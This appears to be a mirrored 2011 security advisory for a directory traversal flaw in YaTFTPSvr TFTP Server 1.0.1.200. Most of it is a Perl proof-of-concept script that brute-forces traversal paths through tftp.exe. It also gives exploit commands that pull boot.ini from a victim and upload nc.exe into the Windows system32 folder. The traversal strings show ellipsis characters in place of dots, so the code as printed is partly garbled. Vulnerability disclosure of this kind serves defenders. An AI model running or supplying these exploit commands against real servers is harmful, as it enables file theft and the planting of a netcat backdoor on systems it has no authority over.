Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27255
HistoryNov 01, 2011 - 12:00 a.m.

YaTFTPSvr TFTP Server Directory Traversal Vulnerability

2011-11-0100:00:00
vulners.com
30

Title: YaTFTPSvr TFTP Server Directory Traversal Vulnerability
Software : YaTFTPSvr TFTP Server
Software Version : 1.0.1.200
Vendor: http://sites.google.com/site/zhaojieding2/
Vulnerability Published : 2011-07-11
Vulnerability Update Time :
Status :
Impact : Medium
Bug Description :
YaTFTPSvr TFTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an TFTP client.
Proof Of Concept :
After installing YaTFTPSvr in C drive, and set some pretreatment:


#!/usr/bin/perl -w
$|=1;
$target_ip=shift || die "usage: $0 \$target_ip\n";
@directory_traversal=(
'…\tmp.txt',
'…\…\tmp.txt',
'…\…\…\tmp.txt',
'…\…\…\…\tmp.txt',
'…\…\…\…\…\tmp.txt',
'…\…\…\…\…\…\tmp.txt',
'…\…\…\…\…\…\…\tmp.txt'
);
open(TMP, ">tmp.txt");
print TMP "tmp";
close(TMP);
foreach $dt_content (@directory_traversal){
$dt_it=`tftp.exe $target_ip put tmp.txt $dt_content`;
print "command : tftp.exe $target_ip put tmp.txt $dt_content\n";
print "$dt_it";
if($dt_it=~m/^Transferred successfully/){
print "Directory Traversal PAYLOAD is $dt_content.\n";
print "Press [ENTER] Button to continue…\n";
<STDIN>;
}
sleep(3);
}
print "Finish!\n";
exit(0);


Exploit :


#get sensitive file
c:\windows\system32>tftp [VICTIM_IP] get …/…/boot.ini boot.ini
#put malware
c:\windows\system32>tftp [VICTIM_IP] put nc.exe …/…/WINDOWS/system32/ncexe


Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/PolyU.HK